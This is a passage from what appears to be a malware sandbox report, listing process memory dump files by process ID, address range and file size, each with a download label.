    Filesize

    144KB

    Download

  • memory/2092-84-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2092-2-0x0000000000820000-0x0000000000844000-memory.dmp

    Filesize

    144KB

    Download

  • memory/2164-142-0x0000000000030000-0x000000000003C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2164-141-0x0000000000030000-0x000000000003C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2216-164-0x0000000000250000-0x000000000026B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2216-165-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2216-163-0x0000000000250000-0x000000000026B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2216-162-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2396-225-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2396-224-0x0000000000230000-0x000000000024B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2564-158-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2564-157-0x0000000000230000-0x0000000000249000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-152-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-143-0x0000000000180000-0x000000000018C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2604-214-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2604-161-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2604-149-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-145-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-218-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2604-160-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-223-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2604-154-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download

  • memory/2604-135-0x0000000000180000-0x000000000018C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2604-126-0x0000000000180000-0x000000000018C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2604-159-0x0000000000400000-0x000000000041B000-memory.dmp

    Filesize

    108KB

    Download

  • memory/2784-151-0x0000000000400000-0x0000000000419000-memory.dmp

    Filesize

    100KB

    Download